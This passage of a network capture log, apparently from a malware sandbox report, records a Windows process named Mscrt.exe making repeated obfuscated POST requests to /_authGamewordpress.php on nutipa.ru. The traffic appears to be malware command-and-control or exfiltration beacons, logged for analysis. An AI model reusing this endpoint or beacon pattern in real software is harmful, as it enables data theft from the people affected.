Dec 15, 2024 04:18:09.106972933 CET	796	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xm6QKJEJc9ByJg4zrTVRlTndHKhLvjVEFyfXZu3P7yd08GWGI%2Fow%2FDjNEWXDau%2F3UzS0MMAoGW3qPOHDnKYSEW3YwL0hB8%2F1JjHgsHcObySBf1ZJMNWwY1lSKKY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348e08fe45e6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3618&min_rtt=1563&rtt_var=4697&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=81075&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49809	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:09.352389097 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:09.701319933 CET	2532	OUT	Data Raw: 50 55 43 58 5f 5e 5d 52 5d 5a 56 51 50 58 57 56 55 55 5e 47 5a 52 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PUCX_^]R]ZVQPXWVUU^GZR[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'([:_=;6>A?+\ 1%%>=3<%>6^?36/+.F'#P 3
Dec 15, 2024 04:18:10.439196110 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:10.687995911 CET	800	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vtzfv0TDv9qGevTOm8NMK9%2Fcx1TFuOXc9%2BUtEMO1Jo6ucSdrlTBulf6n%2FadD8doTcaZMDXB1epgDqRyiSk82W%2FkzKh0tQPr%2Bd4zy41YKnn75jA4S2%2Bs0oRBY5wU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348ea4ed043c1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3496&min_rtt=1586&rtt_var=4416&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=86533&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49813	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:10.933152914 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:11.279407024 CET	2536	OUT	Data Raw: 55 54 46 5c 5a 5b 5d 56 5d 5a 56 51 50 50 57 50 55 55 5e 45 5a 56 5b 5b 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UTF\Z[]V]ZVQPPWPUU^EZV[[YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+^)'X!,.E+=7Z#X22]2>:X3\(#%-+.F'#P
Dec 15, 2024 04:18:12.018999100 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:12.263269901 CET	797	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9E0F37i9b82cY7VLdWv5Fd00PHRTEay%2FBltEx7xoxAJxxSURql91f60rInx%2FrjZuSMBAHU9ud7gfuducQeZcxwy5tpOMdVb8zo4O%2BvhO%2FNz0QGJLBsNa19KdBE8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348f42f4d41e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3204&min_rtt=1630&rtt_var=3759&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=102650&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49814	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:10.947509050 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:11.294915915 CET	1424	OUT	Data Raw: 50 51 43 58 5a 58 58 54 5d 5a 56 51 50 59 57 52 55 52 5e 43 5a 57 5b 59 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQCXZXXT]ZVQPYWRUR^CZW[YYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$Z+1=\ !?6+-(#$\2>\'>=W>0<%.9?9-+.F'#P #
Dec 15, 2024 04:18:12.033067942 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:12.266921997 CET	942	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pP69hAB0iYoSvy2%2Bi5iE3G26we44GD0vrKpTxB2mrNKABu1JomvagiEU41guIBbTiRORyFEt4NyrOV32xFhj3kbw9JrjBYA%2FFiOxjKzB0POT7OsNZ8DhHBMnIc0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348f43b99de96-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7348&min_rtt=1698&rtt_var=11938&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=31128&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 3a 01 21 14 31 0c 23 2e 06 55 3a 12 21 57 3c 20 28 08 27 22 29 59 27 16 24 00 29 03 38 0c 26 17 26 06 22 31 3d 50 3f 09 3d 59 32 0c 21 51 03 11 22 5b 31 00 38 58 2a 39 0e 5d 31 0f 0e 03 25 03 01 06 3c 3b 26 54 33 3b 28 0d 23 2e 06 52 2d 39 23 02 29 39 23 14 2f 2e 2a 57 21 26 2e 53 0c 17 25 10 28 29 07 00 20 1c 35 13 27 02 16 0e 20 3a 31 0d 3e 0d 20 1d 33 23 2f 1f 26 2e 3c 1b 22 23 35 53 26 14 3e 5e 37 0c 03 0f 2a 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:!1#.U:!W< ('")Y'$)8&&"1=P?=Y2!Q"[18X9]1%<;&T3;(#.R-9#)9#/.W!&.S%() 5' :1> 3#/&.<"#5S&>^7*%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49817	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:12.509071112 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:12.857382059 CET	2536	OUT	Data Raw: 55 54 43 51 5f 5b 58 51 5d 5a 56 51 50 5e 57 52 55 5d 5e 41 5a 54 5b 5c 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UTCQ_[XQ]ZVQP^WRU]^AZT[\YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$Z?=.Z=\?\6,.)=/Z#$%&&>.(33>^+U5T;.F'#P ?
Dec 15, 2024 04:18:13.594928980 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:13.839435101 CET	796	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1Ktf3TlHCG5Q6WXDMJy9pj35dqfr5YXCpD7wfFt0BNZUJL6YK4tRDdu7Hs%2BWvtX1GQJGtlVvhXLFh3m1ttxJ3kTpR%2Buv4sv%2Bbg0VKjE1X3asOf4TKWAplDP%2FFY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2348fe091dc47f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3525&min_rtt=1634&rtt_var=4395&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=87080&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49823	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:14.088464975 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:14.435691118 CET	2532	OUT	Data Raw: 55 52 46 5d 5a 5d 58 53 5d 5a 56 51 50 58 57 5b 55 51 5e 46 5a 57 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: URF]Z]XS]ZVQPXW[UQ^FZW[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$Z)=>>$"<+'Y Y$Z2>92.>0;'>:=3,;.F'#P
Dec 15, 2024 04:18:15.176053047 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:15.425146103 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oTB1IXb5ViTdhaV02B0uugFr3XdfBteAjptkNt%2FtVJqnA8rYWeUVeZqG1xGk3Fp0EmQEFr1YN6Jirt%2FI4tx%2FxcsM4wjOFC5gDvZ9P5sHupxzGl8q8CwtjMyi7J8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234907e928727d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3706&min_rtt=1814&rtt_var=4465&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=86105&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49829	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:15.674077034 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:16.030282021 CET	2536	OUT	Data Raw: 50 55 43 5a 5a 5c 58 54 5d 5a 56 51 50 5f 57 53 55 54 5e 45 5a 57 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PUCZZ\XT]ZVQP_WSUT^EZW[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^')=&_=<",:)=!?4\%.%1>U#X$\<U"/.F'#P
Dec 15, 2024 04:18:16.772150993 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:17.023122072 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nrUTCynx0Jnsm5z8jzcvhHBs%2FE8CyDdKni5sCvHh0SdzZUUVvWL3ABJejgeNPCeGVQjkA%2Fgqp8p8arycE5SB5Mz8mTKJT0rdM4BkA26Jw5hsHn40OwS%2FY10hmlk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234911d90b7cf6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3428&min_rtt=1798&rtt_var=3934&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=98396&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49830	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:17.276628017 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49831	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:17.403261900 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1396 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:17.748027086 CET	1396	OUT	Data Raw: 50 53 43 50 5a 5c 58 54 5d 5a 56 51 50 5e 57 52 55 56 5e 40 5a 53 5b 5e 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PSCPZ\XT]ZVQP^WRUV^@ZS[^YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$<->^*#Y5=(-44?8]&>)2-=V) /['=:<5S/.F'#P ?
Dec 15, 2024 04:18:18.505453110 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:18.748054028 CET	944	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8mw6MpLPIbniP00AG9rT0lblkUdx7z%2BP15Gt%2FWTuTp3YUaySXwqsfKmnwRHgkLv9k32TYtM4ER9xS9f7q0dHtet6vMImPzZVsZ4LJZSVWkHycFJ5sFEzGBrtwcA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23491cb84e43b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15640&min_rtt=11084&rtt_var=13270&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=30712&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 5c 36 3a 2e 54 23 3d 28 51 2d 02 29 53 3c 20 24 08 30 0b 25 59 27 28 3b 5c 3d 3d 01 1e 32 5f 21 1c 37 31 29 54 3e 34 3d 58 25 1c 21 51 03 11 22 58 32 3d 3f 01 2a 00 2b 07 31 31 33 5d 25 2e 33 01 28 28 26 57 24 16 2b 54 22 3e 2c 56 2d 39 23 03 3f 5c 37 19 2e 3d 26 50 20 0c 2e 53 0c 17 25 5b 2b 5f 3a 5f 37 31 36 09 24 2f 2b 52 34 00 3e 1e 3d 1d 01 0c 26 30 3b 1d 30 07 37 0b 35 0e 2d 57 32 04 36 5b 37 1c 2e 51 3d 32 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989\6:.T#=(Q-)S< $0%Y'(;\==2_!71)T>4=X%!Q"X2=?*+113]%.3((&W$+T">,V-9#?\7.=&P .S%[+_:_716$/+R4>=&0;075-W26[7.Q=2%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49835	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:17.522432089 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:17.873066902 CET	2532	OUT	Data Raw: 50 51 46 5c 5f 56 5d 51 5d 5a 56 51 50 58 57 5a 55 51 5e 42 5a 52 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PQF\_V]Q]ZVQPXWZUQ^BZR[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(.Z?*\6/>?>3Z7Y$\%>&:( ,$&\+U>,+.F'#P
Dec 15, 2024 04:18:18.607218027 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:18.847136021 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jw6FSeptjxR6ebEXAukweBieklWN6EOyBLoGIDrodEJdMWOUs%2BM5E754OZoX4NNB9a3fVysGF3FFqTwptMEeUQcEeOTrgyeVgWawfoUukyTQhp0IFoUtuYqfovg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23491d5c34de93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4361&min_rtt=1672&rtt_var=6006&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=62955&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49838	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:19.159919977 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:19.513946056 CET	2536	OUT	Data Raw: 50 56 43 5b 5a 5d 58 55 5d 5a 56 51 50 5d 57 56 55 52 5e 48 5a 55 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PVC[Z]XU]ZVQP]WVUR^HZU[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$<=%=Z!,<>/ / \1&Y%X:*U?'="?#/;.F'#P 3
Dec 15, 2024 04:18:20.307750940 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:20.549875975 CET	803	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=443woQ8A%2BaSXX77A4AxTdGpRXf0q0R%2Bf2F%2F6NqqaWrkZtvw1hhEWhYfzINa%2Bf2GijvnqbkryS81%2FD0uc3OH%2BgEwrZf2E22HIvapGdmQKpC1jcInMJZgIkhXG6ck%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234927fcbf176c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29740&min_rtt=28040&rtt_var=13915&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=35062&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49845	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:20.795253992 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
